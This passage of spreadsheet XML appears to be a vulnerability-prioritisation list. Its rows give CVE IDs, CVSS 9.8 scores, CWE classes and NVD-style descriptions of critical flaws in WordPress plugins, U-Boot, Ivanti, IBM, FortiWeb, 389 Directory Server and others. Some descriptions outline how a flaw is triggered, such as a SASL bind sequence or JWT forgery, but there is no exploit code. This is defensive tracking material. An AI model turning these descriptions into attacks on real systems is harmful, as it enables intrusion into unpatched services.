      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-67066</t>
        </is>
      </c>
      <c r="C110" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E110" s="5" t="inlineStr"/>
      <c r="F110" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L110" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in oasys sysoa version 1.0 allows a remote attacker to execute arbitrary code via the outtype parameter in the /outaddresspaging path</t>
        </is>
      </c>
      <c r="M110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-67066</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70149</t>
        </is>
      </c>
      <c r="C111" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E111" s="5" t="inlineStr"/>
      <c r="F111" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr">
        <is>
          <t>codeastro:membership_management_system</t>
        </is>
      </c>
      <c r="I111" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L111" s="5" t="inlineStr">
        <is>
          <t>CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.</t>
        </is>
      </c>
      <c r="M111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70149</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70150</t>
        </is>
      </c>
      <c r="C112" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E112" s="5" t="inlineStr"/>
      <c r="F112" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr">
        <is>
          <t>codeastro:membership_management_system</t>
        </is>
      </c>
      <c r="I112" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L112" s="5" t="inlineStr">
        <is>
          <t>CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.</t>
        </is>
      </c>
      <c r="M112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70150</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70152</t>
        </is>
      </c>
      <c r="C113" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E113" s="5" t="inlineStr"/>
      <c r="F113" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr">
        <is>
          <t>fabian:scholars_tracking_system</t>
        </is>
      </c>
      <c r="I113" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L113" s="5" t="inlineStr">
        <is>
          <t>code-proje</t>
        </is>
      </c>
      <c r="M113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70152</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70290</t>
        </is>
      </c>
      <c r="C114" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E114" s="5" t="inlineStr"/>
      <c r="F114" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="L114" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Denx U-Boot before 2026.04. An integer overflow vulnerability in the ZFS filesystem support can be triggered by malformed on-disk metadata. The issue may result in incorrect memory allocation followed by out-of-bounds memory access, potentially leading to a crash or arbitrary code execution during the boot process.</t>
        </is>
      </c>
      <c r="M114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70290</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70293</t>
        </is>
      </c>
      <c r="C115" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E115" s="5" t="inlineStr"/>
      <c r="F115" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L115" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Denx U-Boot before 2026.04. An integer overflow vulnerability exists in function ext4fs_get_bgdtable, the size calculation can lead to under allocation and this underallocated buffer will be used in memcpy() which could lead to arbitrary code execution, a denial of service, or other unspecified impacts.</t>
        </is>
      </c>
      <c r="M115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70293</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10196</t>
        </is>
      </c>
      <c r="C116" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E116" s="5" t="inlineStr"/>
      <c r="F116" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L116" s="5" t="inlineStr">
        <is>
          <t>The Mail Mint – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.31.0 via deserialization of untrusted input in the 'handle_form_submission' function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code on the server. The vulnerability was partially patched in version 1.23.1.</t>
        </is>
      </c>
      <c r="M116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10196</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12744</t>
        </is>
      </c>
      <c r="C117" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E117" s="5" t="inlineStr"/>
      <c r="F117" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L117" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12745</t>
        </is>
      </c>
      <c r="C118" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E118" s="5" t="inlineStr"/>
      <c r="F118" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L118" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13447</t>
        </is>
      </c>
      <c r="C119" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E119" s="5" t="inlineStr"/>
      <c r="F119" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G119" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L119" s="5" t="inlineStr">
        <is>
          <t>The Mstore Api plugin for WordPress is vulnerable to Authentication Bypass via JWT Forgery in versions up to, and including, 4.20.0 This is due to missing cryptographic signature verification in the FirebasePhoneAuthHelper::verify_id_token() function, which decodes and validates Firebase ID token claims (alg, kid, aud, iss) but never calls openssl_verify() or any equivalent to validate the JWT signature against Google's actual public key certificates. This makes it possible for unauthenticated attackers to forge a Firebase Phone Auth JWT signed with a self-generated RSA key pair and impersonate any phone number, resulting in unauthorized access to existing WordPress accounts or creation of new arbitrary accounts.</t>
        </is>
      </c>
      <c r="M119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13447</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14559</t>
        </is>
      </c>
      <c r="C120" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E120" s="5" t="inlineStr"/>
      <c r="F120" s="5" t="inlineStr"/>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L120" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not verify a user's password before authenticating them, allowing unauthenticated attackers to log in as any registered user, including administrators, by supplying only that user's email address.</t>
        </is>
      </c>
      <c r="M120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14559</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14563</t>
        </is>
      </c>
      <c r="C121" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E121" s="5" t="inlineStr"/>
      <c r="F121" s="5" t="inlineStr"/>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L121" s="5" t="inlineStr">
        <is>
          <t>The advanced-customized-prompts WordPress plugin through 1.0.1 does not verify the password before issuing an authenticated session for a supplied email address in an unauthenticated action, allowing unauthenticated attackers to log in as any registered user, including administrators, or to create arbitrary new accounts.</t>
        </is>
      </c>
      <c r="M121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14563</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16310</t>
        </is>
      </c>
      <c r="C122" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E122" s="5" t="inlineStr"/>
      <c r="F122" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L122" s="5" t="inlineStr">
        <is>
          <t>The MemberDash plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.8.5 via the 'id' parameter due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to change the password of any WordPress user, including administrators, by supplying an arbitrary user ID during registration, and take over their account without any notification sent to the victim.</t>
        </is>
      </c>
      <c r="M122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16310</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16504</t>
        </is>
      </c>
      <c r="C123" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E123" s="5" t="inlineStr"/>
      <c r="F123" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1393, CWE-321</t>
        </is>
      </c>
      <c r="L123" s="5" t="inlineStr">
        <is>
          <t>Deployment of the VPS.org one-click Zulip template deploys a hardcoded application signing key, a default database password ("zulip"), and DISABLE_HTTPS=True.</t>
        </is>
      </c>
      <c r="M123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16504</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18221</t>
        </is>
      </c>
      <c r="C124" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E124" s="5" t="inlineStr"/>
      <c r="F124" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G124" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H124" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I124" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L124" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to gain unauthorized access due to improper validation of client-supplied authentication parameters.</t>
        </is>
      </c>
      <c r="M124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18221</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18351</t>
        </is>
      </c>
      <c r="C125" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E125" s="5" t="inlineStr"/>
      <c r="F125" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L125" s="5" t="inlineStr">
        <is>
          <t>The Drag and Drop File Upload for Elementor Forms plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.6.0 via the elementor_file_upload function. This is due to insufficient file type validation in the is_file_type_valid() function, which uses the attacker-controlled 'type' parameter as regex keys in the MIME allowlist, allowing blacklist bypass via a crafted extension that sanitize_file_name() later normalizes to a PHP extension. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible.</t>
        </is>
      </c>
      <c r="M125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18351</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18658</t>
        </is>
      </c>
      <c r="C126" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E126" s="5" t="inlineStr"/>
      <c r="F126" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G126" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L126" s="5" t="inlineStr">
        <is>
          <t>IBM Operational Decision Manager 9.6.0.0, 9.5.0.0, 8.11.1.0, 8.11.0.1, 8.12.0.1, 9.5.0.1, and 9.0.0.1 is vulnerable to SQL injection. An unauthenticated attacker can execute arbitrary SQL statements and leverage database functionality to write a web shell to the application web root, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="M126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18658</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18749</t>
        </is>
      </c>
      <c r="C127" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E127" s="5" t="inlineStr"/>
      <c r="F127" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L127" s="5" t="inlineStr">
        <is>
          <t>The type=track branch authorises on _is_my_case(t_attach.case) only and never checks VinceTrackAttachment.shared. A coordinator-uploaded case artefact that has NOT been marked shared is still retrievable by any case member who has (or is sent) its uuid — leaks not-yet-released coordinator material to vendors on the case.</t>
        </is>
      </c>
      <c r="M127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18749</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18922</t>
        </is>
      </c>
      <c r="C128" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E128" s="5" t="inlineStr"/>
      <c r="F128" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L128" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389 Directory Server. During SASL PLAIN authentication, a stale identity carried in a Cyrus SASL auxiliary property from a prior failed bind attempt can be installed on a connection following a subsequent, unrelated successful bind, regardless of which SASL mechanism completes that second bind. An attacker can send a SASL PLAIN bind as cn=Directory Manager with an incorrect password, then complete a SASL ANONYMOUS bind on the same connection, causing the server to grant Directory Manager authority without any valid credentials. A variant using a valid low-privileged account's own successful bind instead of an anonymous one is also possible.</t>
        </is>
      </c>
      <c r="M128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18922</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19931</t>
        </is>
      </c>
      <c r="C129" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E129" s="5" t="inlineStr"/>
      <c r="F129" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L129" s="5" t="inlineStr">
        <is>
          <t>A flaw in libcurl makes it wrongly reuse an HTTP connection setup for a given
hostname using Negotiate authentication, when the initial request is done
using empty credentials. This can make user B's request get sent over user A's
previously authenticated connection.</t>
        </is>
      </c>
      <c r="M129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19931</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26035</t>
        </is>
      </c>
      <c r="C130" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E130" s="5" t="inlineStr"/>
      <c r="F130" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G130" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H130" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortiweb</t>
        </is>
      </c>
      <c r="I130" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L130" s="5" t="inlineStr">
        <is>
          <t>An Improper Authentication vulnerability [CWE-287] vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.0 through 7.4.11, FortiWeb 7.2.0 through 7.2.12, FortiWeb 7.0.0 through 7.0.12 may allow a remote unauthenticated attacker to login into the Fortiweb GUI/CLI with a random username and password</t>
        </is>
      </c>
      <c r="M130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26035</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28606</t>
        </is>
      </c>
      <c r="C131" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E131" s="5" t="inlineStr"/>
      <c r="F131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G131" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L131" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28780</t>
        </is>
      </c>
      <c r="C132" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E132" s="5" t="inlineStr"/>
      <c r="F132" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G132" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H132" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I132" s="5" t="inlineStr">
        <is>
          <t>2026-05-05</t>
        </is>
      </c>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L132" s="5" t="inlineStr">
        <is>
